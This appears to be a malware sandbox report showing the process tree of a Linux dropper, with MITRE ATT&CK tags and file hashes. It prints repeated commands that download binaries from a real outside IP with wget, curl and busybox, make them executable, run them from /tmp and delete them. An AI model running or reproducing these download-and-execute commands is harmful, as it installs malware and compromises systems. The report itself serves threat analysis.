/bin/chmodchmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:885
-
-
/bin/chmodchmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:891
-
-
/bin/chmodchmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:897
-
-
/bin/chmodchmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:906
-
-
/bin/chmodchmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- System Network Configuration Discovery
PID:910
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7